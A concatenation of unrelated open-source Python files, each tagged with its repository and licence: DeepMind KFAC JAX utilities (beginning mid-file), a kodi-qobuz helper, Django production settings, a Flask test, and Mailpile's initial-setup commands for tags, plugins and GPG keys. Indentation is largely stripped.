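# Note on the wrappers above: lax.pmean/lax.psum require the named mapped axis
# to be present, and core.axis_frame is expected to raise NameError when it is
# not (hence the except clause), so pmean_if_pmap/psum_if_pmap reduce across
# devices inside a pmap with that axis_name and act as the identity otherwise.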
compute_mean = jax.pmap(lambda x: lax.pmean(x, "i"), axis_name="i")
compute_sum = jax.pmap(lambda x: lax.psum(x, "i"), axis_name="i")
def get_first(obj: T) -> T:
return jax.tree_map(lambda x: x[0], obj)
def get_mean(obj: T) -> T:
return get_first(compute_mean(obj))
def get_sum(obj: T) -> T:
return get_first(compute_sum(obj))
broadcast_all_local_devices = jax.pmap(lambda x: x)
def replicate_all_local_devices(obj: T) -> T:
n = jax.local_device_count()
obj_stacked = jax.tree_map(lambda x: jnp.stack([x] * n, axis=0), obj)
return broadcast_all_local_devices(obj_stacked)
def make_different_rng_key_on_all_devices(rng: jnp.ndarray) -> jnp.ndarray:
rng = jax.random.fold_in(rng, jax.host_id())
rng = jax.random.split(rng, jax.local_device_count())
return broadcast_all_local_devices(rng)
p_split = jax.pmap(lambda key: tuple(jax.random.split(key)))
def scalar_mul(obj: T, scalar: Union[float, jnp.ndarray]) -> T:
return jax.tree_map(lambda x: x * scalar, obj)
def scalar_div(obj: T, scalar: Union[float, jnp.ndarray]) -> T:
return jax.tree_map(lambda x: x / scalar, obj)
def make_func_args(params, func_state, rng, batch, has_state: bool,
has_rng: bool):
"""Correctly puts all arguments to the function together."""
func_args = (params,)
if has_state:
if func_state is None:
raise ValueError("The `func_state` is None, but the argument `has_state` "
"is True.")
func_args += (func_state,)
if has_rng:
if rng is None:
raise ValueError("The `rng` is None, but the argument `has_rng` is True.")
func_args += (rng,)
func_args += (batch,)
return func_args
def extract_func_outputs(
raw_outputs: Any,
has_aux: bool,
has_state: bool,
) -> Tuple[jnp.ndarray, Any, Any]:
"""Given the function output returns separately the loss, func_state, aux."""
if not has_aux and not has_state:
return raw_outputs, None, None
loss, other = raw_outputs
if has_aux and has_state:
func_state, aux = other
elif has_aux:
func_state, aux = None, other
else:
func_state, aux = other, None
return loss, func_state, aux
def inner_product(obj1: T, obj2: T) -> jnp.ndarray:
if jax.tree_structure(obj1) != jax.tree_structure(obj2):
raise ValueError("The two structures are not identical.")
elements_product = jax.tree_multimap(lambda x, y: jnp.sum(x * y), obj1, obj2)
return sum(jax.tree_flatten(elements_product)[0])
def psd_inv_cholesky(matrix: jnp.ndarray, damping: jnp.ndarray) -> jnp.ndarray:
assert matrix.ndim == 2
identity = jnp.eye(matrix.shape[0])
matrix = matrix + damping * identity
return linalg.solve(matrix, identity, sym_pos=True)
def solve_maybe_small(a: jnp.ndarray, b: jnp.ndarray) -> jnp.ndarray:
"""Computes a^-1 b more efficiently for small matrices."""
assert a.shape[-1] == a.shape[-2] == b.shape[-1]
d = a.shape[-1]
if d == 0:
return a
elif d == 1:
return b / a[..., 0]
elif d == 2:
det = a[..., 0, 0] * a[..., 1, 1] - a[..., 0, 1] * a[..., 1, 0]
b_0 = a[..., 1, 1] * b[..., 0] - a[..., 0, 1] * b[..., 1]
b_1 = a[..., 0, 0] * b[..., 1] - a[..., 1, 0] * b[..., 0]
return jnp.stack([b_0, b_1], axis=-1) / det
elif d == 3:
raise NotImplementedError()
return jnp.linalg.solve(a, b)
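# The d == 2 branch above is Cramer's rule written out explicitly: with
# det = a00 * a11 - a01 * a10 it returns
# [a11 * b0 - a01 * b1, a00 * b1 - a10 * b0] / det, which avoids a general
# linalg solve for such small systems.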
def pi_adjusted_inverse(
factor_0: jnp.ndarray,
factor_1: jnp.ndarray,
damping: jnp.ndarray,
pmap_axis_name: str,
) -> Tuple[jnp.ndarray, jnp.ndarray]:
"""Performs inversion with pi-adjusted damping."""
# Compute the norms of each factor
norm_0 = jnp.trace(factor_0)
norm_1 = jnp.trace(factor_1)
  # We need to sync the norms here, because reductions can be non-deterministic
  # (and they are on GPUs by default, for better performance). Hence, although
  # factor_0 and factor_1 are synced, the trace operations above can still
  # produce different answers on different devices.
norm_0, norm_1 = pmean_if_pmap((norm_0, norm_1), axis_name=pmap_axis_name)
# Compute the overall scale
scale = norm_0 * norm_1
def regular_inverse(
operand: Sequence[jnp.ndarray]) -> Tuple[jnp.ndarray, jnp.ndarray]:
factor0, factor1, norm0, norm1, s, d = operand
# Special cases with one or two scalar factors
if factor0.size == 1 and factor1.size == 1:
value = jnp.ones_like(factor0) / jnp.sqrt(s)
return value, value
if factor0.size == 1:
factor1_normed = factor1 / norm1
damping1 = d / norm1
factor1_inv = psd_inv_cholesky(factor1_normed, damping1)
return jnp.full((1, 1), s), factor1_inv
if factor1.size == 1:
factor0_normed = factor0 / norm0
damping0 = d / norm0
factor0_inv = psd_inv_cholesky(factor0_normed, damping0)
return factor0_inv, jnp.full((1, 1), s)
# Invert first factor
factor0_normed = factor0 / norm0
damping0 = jnp.sqrt(d * factor1.shape[0] / (s * factor0.shape[0]))
factor0_inv = psd_inv_cholesky(factor0_normed, damping0) / jnp.sqrt(s)
# Invert second factor
factor1_normed = factor1 / norm1
damping1 = jnp.sqrt(d * factor0.shape[0] / (s * factor1.shape[0]))
factor1_inv = psd_inv_cholesky(factor1_normed, damping1) / jnp.sqrt(s)
return factor0_inv, factor1_inv
def zero_inverse(
operand: Sequence[jnp.ndarray]) -> Tuple[jnp.ndarray, jnp.ndarray]:
return (jnp.eye(factor_0.shape[0]) / jnp.sqrt(operand[-1]),
jnp.eye(factor_1.shape[0]) / jnp.sqrt(operand[-1]))
# In the special case where for some reason one of the factors is zero, then
# the correct inverse of `(0 kron A + lambda I)` is
# `(I/sqrt(lambda) kron (I/sqrt(lambda)`. However, because one of the norms is
# zero, then `pi` and `1/pi` would be 0 and infinity leading to NaN values.
# Hence, we need to make this check explicitly.
return lax.cond(
jnp.greater(scale, 0.0),
regular_inverse,
zero_inverse,
operand=(factor_0, factor_1, norm_0, norm_1, scale, damping))
def convert_value_and_grad_to_value_func(
value_and_grad_func,
has_aux: bool = False,
):
"""Converts a value_and_grad function to value_func only."""
def value_func(*args, **kwargs):
out, _ = value_and_grad_func(*args, **kwargs)
if has_aux:
return out[0]
else:
return out
return value_func
def check_structure_shapes_and_dtype(obj1: T, obj2: T) -> None:
"""Verifies that the two objects have the same pytree structure."""
assert jax.tree_structure(obj1) == jax.tree_structure(obj2)
for v1, v2 in zip(jax.tree_flatten(obj1)[0], jax.tree_flatten(obj2)[0]):
assert v1.shape == v2.shape
assert v1.dtype == v2.dtype
def check_first_dim_is_batch_size(batch_size: int, *args: jnp.ndarray) -> None:
for i, arg in enumerate(args):
if arg.shape[0] != batch_size:
raise ValueError(f"Expecting first dimension of arg[{i}] with shape "
f"{arg.shape} to be equal to the batch size "
f"{batch_size}.")
def py_tree_registered_dataclass(cls, *args, **kwargs):
"""Creates a new dataclass type and registers it as a pytree node."""
dcls = dataclasses.dataclass(cls, *args, **kwargs)
tree_util.register_pytree_node(
dcls,
lambda instance: ( # pylint: disable=g-long-lambda
[getattr(instance, f.name)
for f in dataclasses.fields(instance)], None),
lambda _, instance_args: dcls(*instance_args))
return dcls
class WeightedMovingAverage:
"""A wrapped class for a variable for which we keep exponential moving average."""
def __init__(self, weight: jnp.ndarray, array: jnp.ndarray):
self._weight = weight
self._array = array
@staticmethod
def zero(shape: Sequence[int]) -> "WeightedMovingAverage":
return WeightedMovingAverage(weight=jnp.zeros([]), array=jnp.zeros(shape))
@property
def weight(self) -> jnp.ndarray:
return self._weight
@property
def value(self) -> jnp.ndarray:
return self._array / self._weight
@property
def raw_value(self) -> jnp.ndarray:
return self._array
def update(self, value: jnp.ndarray, old_weight_multiplier: float,
new_weight: float) -> None:
self._weight = old_weight_multiplier * self._weight + new_weight
self._array = old_weight_multiplier * self._array + new_weight * value
def sync(self, pmap_axis_name: str) -> None:
self._array = pmean_if_pmap(self._array, pmap_axis_name)
def __str__(self) -> str:
return (f"ExponentialMovingAverage(weight={self._weight}, "
f"array={self._array})")
def __repr__(self) -> str:
return self.__str__()
tree_util.register_pytree_node(
WeightedMovingAverage,
lambda instance: ((instance.weight, instance.raw_value), None),
lambda _, instance_args: WeightedMovingAverage(*instance_args),
)
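# Illustrative usage sketch (the shapes and constants are arbitrary): the class
# keeps the weighted sum and total weight separately, so `value` is always the
# normalized estimate, e.g.
#   ema = WeightedMovingAverage.zero([2, 2])
#   ema.update(jnp.ones([2, 2]), old_weight_multiplier=0.95, new_weight=1.0)
#   current = ema.value  # equals raw_value / weight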
class Stateful:
"""A class for stateful objects."""
def __init__(self, stateful_fields_names: Optional[Sequence[str]] = ()):
self.__stateful_fields_names = stateful_fields_names
def _add_stateful_fields_names(self, value: Sequence[str]) -> None:
self.__stateful_fields_names += tuple(value)
def get_state(self) -> Mapping[str, Any]:
"""Returns the state of the object."""
state = dict()
for name in self.__stateful_fields_names:
state[name] = Stateful._get_state_from_instance(getattr(self, name))
return state
def set_state(self, value):
"""Sets the state of the object with the provided value and returns the object."""
assert isinstance(value, dict)
for name in self.__stateful_fields_names:
setattr(self, name,
Stateful._set_state_to_instance(getattr(self, name), value[name]))
return self
def clear_state(self) -> None:
"""Clears the state of the object."""
for name in self.__stateful_fields_names:
setattr(self, name,
Stateful._clear_state_from_instance(getattr(self, name)))
def pop_state(self) -> Mapping[str, Any]:
"""Returns the current state of the object, while simultaneously clearing it."""
state = self.get_state()
self.clear_state()
return state
@staticmethod
def _get_state_from_instance(obj):
"""Recursively gets the state of the object and returns it."""
if isinstance(obj, Stateful):
return obj.get_state()
if isinstance(obj, list):
return [Stateful._get_state_from_instance(i) for i in obj]
if isinstance(obj, tuple):
return tuple(Stateful._get_state_from_instance(i) for i in obj)
if isinstance(obj, collections.OrderedDict):
return collections.OrderedDict(
(k, Stateful._get_state_from_instance(v)) for k, v in obj.items())
if isinstance(obj, dict):
return dict(
(k, Stateful._get_state_from_instance(v)) for k, v in obj.items())
return obj
@staticmethod
def _set_state_to_instance(obj, value):
"""Recursively sets the state of the object and returns it."""
if isinstance(obj, Stateful):
obj.set_state(value)
return obj
if isinstance(value, list):
if obj is None:
obj = [None] * len(value)
return [
Stateful._set_state_to_instance(obj_i, value_i)
for obj_i, value_i in zip(obj, value)
]
if isinstance(value, tuple):
if obj is None:
obj = [None] * len(value)
return tuple(
Stateful._set_state_to_instance(obj_i, value_i)
for obj_i, value_i in zip(obj, value))
if isinstance(value, collections.OrderedDict):
if obj is None:
obj = dict((k, None) for k in value)
return collections.OrderedDict(
(k, Stateful._set_state_to_instance(obj[k], value[k])) for k in obj)
if isinstance(value, dict):
obj = dict((k, None) for k in value)
return dict(
(k, Stateful._set_state_to_instance(obj[k], value[k])) for k in obj)
return value
@staticmethod
def _clear_state_from_instance(obj):
"""Recursively clears the state of the object and returns it."""
if isinstance(obj, Stateful):
obj.clear_state()
return obj
if isinstance(obj, list):
return [Stateful._clear_state_from_instance(obj_i) for obj_i in obj]
if isinstance(obj, tuple):
return tuple(Stateful._clear_state_from_instance(obj_i) for obj_i in obj)
if isinstance(obj, collections.OrderedDict):
return collections.OrderedDict(
(k, Stateful._clear_state_from_instance(obj[k])) for k in obj)
if isinstance(obj, dict):
return dict((k, Stateful._clear_state_from_instance(obj[k])) for k in obj)
return None
@staticmethod
def infer_class_state(class_type):
"""Infers a stateful class state attributes from class annotations."""
if not issubclass(class_type, Stateful):
raise ValueError(
f"In order to annotate a class as stateful it must inherit "
f"{Stateful!r}")
class_type = dataclasses.dataclass(
class_type, init=False, repr=False, eq=False) # pytype: disable=wrong-keyword-args
fields_names = tuple(field.name for field in dataclasses.fields(class_type))
original_init = getattr(class_type, "__init__", None)
if original_init is None:
def injected_init(self, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs) # pylint: disable=bad-super-call
Stateful._add_stateful_fields_names(self, fields_names)
for field_name in fields_names:
if getattr(self, field_name, None) is None:
setattr(self, field_name, None)
setattr(class_type, "__init__", injected_init)
else:
def injected_init(self, *args, **kwargs):
original_init(self, *args, **kwargs)
Stateful._add_stateful_fields_names(self, fields_names)
for field_name in fields_names:
if getattr(self, field_name, None) is None:
setattr(self, field_name, None)
setattr(class_type, "__init__", injected_init)
return class_type
def compute_sq_norm_relative_abs_diff(obj, pmap_axis_name):
sq_norm = inner_product(obj, obj)
synced_sq_norm = psum_if_pmap(sq_norm, pmap_axis_name)
synced_sq_norm = (synced_sq_norm - sq_norm) / (jax.device_count() - 1.0)
sq_norm_abs_diff = jnp.abs(sq_norm - synced_sq_norm)
return sq_norm_abs_diff / sq_norm
def product(iterable_object):
x = 1
for element in iterable_object:
x *= element
return x
|
deepmind/deepmind-research
|
kfac_ferminet_alpha/utils.py
|
Python
|
apache-2.0
| 15,537
|
'''
qobuz.node.helper
~~~~~~~~~~~~~~~~~
:part_of: kodi-qobuz
:copyright: (c) 2012-2018 by Joachim Basmaison, Cyril Leclerc
:license: GPLv3, see LICENSE for more details.
'''
from qobuz.debug import getLogger
from qobuz.node import getNode, Flag
logger = getLogger(__name__)
def make_local_track_url(config, track):
return '{scheme}://{host}:{port}/qobuz/{album_id}/{nid}.mpc'.format(
scheme='http',
host=config.app.registry.get('httpd_host'),
port=config.app.registry.get('httpd_port'),
album_id=track.get_album_id(),
nid=str(track.nid))
def make_local_album_url(config, album):
return '{scheme}://{host}:{port}/qobuz/{album_id}/'.format(
scheme='http',
host=config.app.registry.get('httpd_host'),
port=config.app.registry.get('httpd_port'),
album_id=album.nid)
class TreeTraverseOpts(object):
_properties = ['xdir', 'lvl', 'whiteFlag', 'blackFlag', 'noRemote', 'data']
def __init__(self, **ka):
self.xdir = None
self.lvl = None
self.whiteFlag = None
self.blackFlag = None
self.noRemote = False
self.data = None
self.parse_keyword_argument(**ka)
def parse_keyword_argument(self, **ka):
for key in ka:
if key not in self._properties:
raise KeyError(key)
setattr(self, key, ka.get(key))
def clone(self):
return TreeTraverseOpts(**{p: getattr(self, p)
for p in self._properties})
def get_tree_traverse_opts(options=None):
if options is None:
return TreeTraverseOpts()
return options.clone()
def get_node_album(album):
node = getNode(Flag.ALBUM, data=album)
cache = node.fetch(TreeTraverseOpts(noRemote=True))
if cache is not None:
node.data = cache
return node
|
tidalf/plugin.audio.qobuz
|
resources/lib/qobuz/node/helper.py
|
Python
|
gpl-3.0
| 1,876
|
# -*- coding: utf-8 -*-
'''
Production Configurations
- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use sendgrid to send emails
- Use MEMCACHIER on Heroku
'''
from configurations import values
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
    # TODO: Fix this so the S3 import is not attempted in Dev.
pass
from .common import Common
class Production(Common):
# This ensures that Django will be able to detect a secure connection
# properly on Heroku.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
# END INSTALLED_APPS
# SECRET KEY
SECRET_KEY = values.SecretValue()
# END SECRET KEY
# django-secure
INSTALLED_APPS += ("djangosecure", )
# MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'djangosecure.middleware.SecurityMiddleware',
)
MIDDLEWARE_CLASSES += Common.MIDDLEWARE_CLASSES
# END MIDDLEWARE CONFIGURATION
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
SECURE_FRAME_DENY = values.BooleanValue(True)
SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
SESSION_COOKIE_SECURE = values.BooleanValue(False)
SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
SECURE_SSL_REDIRECT = values.BooleanValue(True)
# end django-secure
# SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
# END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
# STORAGE CONFIGURATION
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = values.SecretValue()
AWS_SECRET_ACCESS_KEY = values.SecretValue()
AWS_STORAGE_BUCKET_NAME = values.SecretValue()
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
# see: https://github.com/antonagestam/collectfast
AWS_PRELOAD_METADATA = True
INSTALLED_APPS += ('collectfast', )
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIRY = 60 * 60 * 24 * 7
AWS_HEADERS = {
'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (
AWS_EXPIRY, AWS_EXPIRY)
}
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
# END STORAGE CONFIGURATION
# EMAIL
DEFAULT_FROM_EMAIL = values.Value('goodtechgigs <noreply@goodtechgigs.org>')
EMAIL_HOST = values.Value('smtp.sendgrid.com')
EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
EMAIL_SUBJECT_PREFIX = values.Value('[goodtechgigs] ', environ_name="EMAIL_SUBJECT_PREFIX")
EMAIL_USE_TLS = True
SERVER_EMAIL = EMAIL_HOST_USER
# END EMAIL
# TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
# END TEMPLATE CONFIGURATION
# CACHING
    # Only do this here because, thanks to django-pylibmc-sasl and pylibmc,
    # memcacheify is painful to install on Windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
# END CACHING
# Your production stuff: Below this line define 3rd party library settings
|
aschn/goodtechgigs
|
goodtechgigs/config/production.py
|
Python
|
apache-2.0
| 4,647
|
import os
from angel_tree import app, bcrypt
from angel_tree.mod_family.controllers import *
from angel_tree.mod_family.models import *
from angel_tree.mod_auth.models import User
from flask import url_for
from flask_login import current_user
from flask_principal import PermissionDenied
import unittest
import tempfile
from .mod_auth_test import create_user, _username, _password
class ModFamilytestCase(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
User.drop_collection()
self.username = _username
self.password = _password
def test_family_index(self):
create_user()
with self.app:
self.app.post('/auth/login', data=dict(
email=_username,
password=_password
), follow_redirects=False)
result = self.app.get('/family')
self.assertEqual(result.status_code, 200)
def test_family_labels(self):
create_user()
with self.app:
self.app.post('/auth/login', data=dict(
email=_username,
password=_password
), follow_redirects=False)
result = self.app.get('/family/labels')
self.assertEqual(result.status_code, 200)
def tearDown(self):
pass
|
TreeTopper/TreeTopper
|
tests/family_test.py
|
Python
|
mit
| 1,349
|
import os
import random
import sys
from datetime import date
from urllib import urlencode
import mailpile.auth
from mailpile.defaults import CONFIG_RULES
from mailpile.i18n import ListTranslations, ActivateTranslation, gettext
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.plugins import PluginManager
from mailpile.plugins import PLUGINS
from mailpile.plugins.contacts import AddProfile
from mailpile.plugins.contacts import ListProfiles
from mailpile.plugins.migrate import Migrate
from mailpile.plugins.tags import AddTag
from mailpile.commands import Command
from mailpile.config import SecurePassphraseStorage
from mailpile.crypto.gpgi import GnuPG, SignatureInfo, EncryptionInfo
from mailpile.crypto.gpgi import GnuPGKeyGenerator, GnuPGKeyEditor
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
from mailpile.smtp_client import SendMail, SendMailError
from mailpile.urlmap import UrlMap
from mailpile.ui import Session
from mailpile.util import *
_ = lambda s: s
_plugins = PluginManager(builtin=__file__)
##[ Commands ]################################################################
class SetupMagic(Command):
"""Perform initial setup"""
SYNOPSIS = (None, None, None, None)
ORDER = ('Internals', 0)
LOG_PROGRESS = True
TAGS = {
'New': {
'type': 'unread',
'label': False,
'display': 'invisible',
'icon': 'icon-new',
'label_color': '03-gray-dark',
'name': _('New'),
},
'Inbox': {
'type': 'inbox',
'display': 'priority',
'display_order': 2,
'icon': 'icon-inbox',
'label_color': '06-blue',
'name': _('Inbox'),
},
'Blank': {
'type': 'blank',
'flag_editable': True,
'display': 'invisible',
'name': _('Blank'),
},
'Drafts': {
'type': 'drafts',
'flag_editable': True,
'display': 'priority',
'display_order': 1,
'icon': 'icon-compose',
'label_color': '03-gray-dark',
'name': _('Drafts'),
},
'Outbox': {
'type': 'outbox',
'display': 'priority',
'display_order': 3,
'icon': 'icon-outbox',
'label_color': '06-blue',
'name': _('Outbox'),
},
'Sent': {
'type': 'sent',
'display': 'priority',
'display_order': 4,
'icon': 'icon-sent',
'label_color': '03-gray-dark',
'name': _('Sent'),
},
'Spam': {
'type': 'spam',
'flag_hides': True,
'display': 'priority',
'display_order': 5,
'icon': 'icon-spam',
'label_color': '10-orange',
'name': _('Spam'),
},
'MaybeSpam': {
'display': 'invisible',
'icon': 'icon-spam',
'label_color': '10-orange',
'name': _('MaybeSpam'),
},
'Ham': {
'type': 'ham',
'display': 'invisible',
'name': _('Ham'),
},
'Trash': {
'type': 'trash',
'flag_hides': True,
'display': 'priority',
'display_order': 6,
'icon': 'icon-trash',
'label_color': '13-brown',
'name': _('Trash'),
},
# These are magical tags that perform searches and show
# messages in contextual views.
'All Mail': {
'type': 'tag',
'icon': 'icon-logo',
'label_color': '06-blue',
'search_terms': 'all:mail',
'name': _('All Mail'),
'display_order': 1000,
},
'Photos': {
'type': 'tag',
'icon': 'icon-photos',
'label_color': '08-green',
'search_terms': 'att:jpg',
'name': _('Photos'),
'template': 'photos',
'display_order': 1001,
},
'Files': {
'type': 'tag',
'icon': 'icon-document',
'label_color': '06-blue',
'search_terms': 'has:attachment',
'name': _('Files'),
'template': 'files',
'display_order': 1002,
},
'Links': {
'type': 'tag',
'icon': 'icon-links',
'label_color': '12-red',
'search_terms': 'http',
'name': _('Links'),
'display_order': 1003,
},
# These are internal tags, used for tracking user actions on
# messages, as input for machine learning algorithms. These get
# automatically added, and may be automatically removed as well
# to keep the working sets reasonably small.
'mp_rpl': {'type': 'replied', 'label': False, 'display': 'invisible'},
'mp_fwd': {'type': 'fwded', 'label': False, 'display': 'invisible'},
'mp_tag': {'type': 'tagged', 'label': False, 'display': 'invisible'},
'mp_read': {'type': 'read', 'label': False, 'display': 'invisible'},
'mp_ham': {'type': 'ham', 'label': False, 'display': 'invisible'},
}
def basic_app_config(self, session,
save_and_update_workers=True,
want_daemons=True):
# Create local mailboxes
session.config.open_local_mailbox(session)
# Create standard tags and filters
created = []
for t in self.TAGS:
if not session.config.get_tag_id(t):
AddTag(session, arg=[t]).run(save=False)
created.append(t)
session.config.get_tag(t).update(self.TAGS[t])
for stype, statuses in (('sig', SignatureInfo.STATUSES),
('enc', EncryptionInfo.STATUSES)):
for status in statuses:
tagname = 'mp_%s-%s' % (stype, status)
if not session.config.get_tag_id(tagname):
AddTag(session, arg=[tagname]).run(save=False)
created.append(tagname)
session.config.get_tag(tagname).update({
'type': 'attribute',
'display': 'invisible',
'label': False,
})
if 'New' in created:
session.ui.notify(_('Created default tags'))
# Import all the basic plugins
reload_config = False
for plugin in PLUGINS:
if plugin not in session.config.sys.plugins:
session.config.sys.plugins.append(plugin)
reload_config = True
for plugin in session.config.plugins.WANTED:
if plugin in session.config.plugins.available():
session.config.sys.plugins.append(plugin)
if reload_config:
with session.config._lock:
session.config.save()
session.config.load(session)
try:
# If spambayes is not installed, this will fail
import mailpile.plugins.autotag_sb
if 'autotag_sb' not in session.config.sys.plugins:
session.config.sys.plugins.append('autotag_sb')
session.ui.notify(_('Enabling spambayes autotagger'))
except ImportError:
session.ui.warning(_('Please install spambayes '
'for super awesome spam filtering'))
vcard_importers = session.config.prefs.vcard.importers
if not vcard_importers.gravatar:
vcard_importers.gravatar.append({'active': True})
session.ui.notify(_('Enabling gravatar image importer'))
gpg_home = os.path.expanduser('~/.gnupg')
if os.path.exists(gpg_home) and not vcard_importers.gpg:
vcard_importers.gpg.append({'active': True,
'gpg_home': gpg_home})
session.ui.notify(_('Importing contacts from GPG keyring'))
if ('autotag_sb' in session.config.sys.plugins and
len(session.config.prefs.autotag) == 0):
session.config.prefs.autotag.append({
'match_tag': 'spam',
'unsure_tag': 'maybespam',
'tagger': 'spambayes',
'trainer': 'spambayes'
})
session.config.prefs.autotag[0].exclude_tags[0] = 'ham'
if save_and_update_workers:
session.config.save()
session.config.prepare_workers(session, daemons=want_daemons)
def setup_command(self, session, do_gpg_stuff=False):
do_gpg_stuff = do_gpg_stuff or ('do_gpg_stuff' in self.args)
# Stop the workers...
want_daemons = session.config.cron_worker is not None
session.config.stop_workers()
# Perform any required migrations
Migrate(session).run(before_setup=True, after_setup=False)
# Basic app config, tags, plugins, etc.
self.basic_app_config(session,
save_and_update_workers=False,
want_daemons=want_daemons)
# Assumption: If you already have secret keys, you want to
# use the associated addresses for your e-mail.
# If you don't already have secret keys, you should have
# one made for you, if GnuPG is available.
# If GnuPG is not available, you should be warned.
if do_gpg_stuff:
gnupg = GnuPG(None)
accepted_keys = []
if gnupg.is_available():
keys = gnupg.list_secret_keys()
for key, details in keys.iteritems():
# Ignore revoked/expired keys.
if ("revocation-date" in details and
details["revocation-date"] <=
date.today().strftime("%Y-%m-%d")):
continue
accepted_keys.append(key)
for uid in details["uids"]:
if "email" not in uid or uid["email"] == "":
continue
if uid["email"] in [x["email"]
for x in session.config.profiles]:
# Don't set up the same e-mail address twice.
continue
# FIXME: Add route discovery mechanism.
profile = {
"email": uid["email"],
"name": uid["name"],
}
session.config.profiles.append(profile)
if (session.config.prefs.gpg_recipient in (None, '', '!CREATE')
and details["capabilities_map"]["encrypt"]):
session.config.prefs.gpg_recipient = key
session.ui.notify(_('Encrypting config to %s') % key)
if session.config.prefs.crypto_policy == 'none':
session.config.prefs.crypto_policy = 'openpgp-sign'
if len(accepted_keys) == 0:
# FIXME: Start background process generating a key once a user
# has supplied a name and e-mail address.
pass
else:
session.ui.warning(_('Oh no, PGP/GPG support is unavailable!'))
# If we have a GPG key, but no master key, create it
self.make_master_key()
# Perform any required migrations
Migrate(session).run(before_setup=False, after_setup=True)
session.config.save()
session.config.prepare_workers(session, daemons=want_daemons)
return self._success(_('Performed initial Mailpile setup'))
def make_master_key(self):
session = self.session
if (session.config.prefs.gpg_recipient not in (None, '', '!CREATE')
and not session.config.master_key
and not session.config.prefs.obfuscate_index):
#
# This secret is arguably the most critical bit of data in the
            # app: it is used as an encryption key and to seed hashes in
# a few places. As such, the user may need to type this in
# manually as part of data recovery, so we keep it reasonably
# sized and devoid of confusing chars.
#
# The strategy below should give about 281 bits of randomness:
#
# import math
# math.log((25 + 25 + 8) ** (12 * 4), 2) == 281.183...
#
secret = ''
chars = 12 * 4
while len(secret) < chars:
secret = sha512b64(os.urandom(1024),
'%s' % session.config,
'%s' % time.time())
secret = CleanText(secret,
banned=CleanText.NONALNUM + 'O01l'
).clean[:chars]
session.config.master_key = secret
if self._idx() and self._idx().INDEX:
session.ui.warning(_('Unable to obfuscate search index '
'without losing data. Not indexing '
'encrypted mail.'))
else:
session.config.prefs.obfuscate_index = True
session.config.prefs.index_encrypted = True
session.ui.notify(_('Obfuscating search index and enabling '
'indexing of encrypted e-mail. Yay!'))
return True
else:
return False
def command(self, *args, **kwargs):
session = self.session
if session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
return self.setup_command(session, *args, **kwargs)
class TestableWebbable(SetupMagic):
HTTP_AUTH_REQUIRED = 'Maybe'
HTTP_CALLABLE = ('GET', )
HTTP_QUERY_VARS = {
'_path': 'Redirect path'
}
HTTP_POST_VARS = {
'testing': 'Yes or No, if testing',
'advance': 'Yes or No, advance setup flow',
}
TRUTHY = {
'0': False, 'no': False, 'fuckno': False, 'false': False,
'1': True, 'yes': True, 'hellyeah': True, 'true': True,
}
def _advance(self):
path = self.data.get('_path', [None])[0]
data = dict([(k, v) for k, v in self.data.iteritems()
if k not in self.HTTP_POST_VARS
and k not in ('_method',)])
nxt = Setup.Next(self.session.config, None, needed_auth=False)
if nxt:
url = '/%s/' % nxt.SYNOPSIS[2]
elif path and path != '/%s/' % Setup.SYNOPSIS[2]:
# Use the same redirection logic as the Authenticator
mailpile.auth.Authenticate.RedirectBack(path, data)
else:
url = '/'
qs = urlencode([(k, v) for k, vl in data.iteritems() for v in vl])
raise UrlRedirectException(''.join([url, '?%s' % qs if qs else '']))
def _success(self, message, result=True, advance=False):
if (advance or
self.TRUTHY.get(self.data.get('advance', ['no'])[0].lower())):
self._advance()
return SetupMagic._success(self, message, result=result)
def _testing(self):
self._testing_yes(lambda: True)
return (self.testing is not None)
def _testing_yes(self, method, *args, **kwargs):
testination = self.data.get('testing')
if testination:
self.testing = random.randint(0, 1)
if testination[0].lower() in self.TRUTHY:
self.testing = self.TRUTHY[testination[0].lower()]
return self.testing
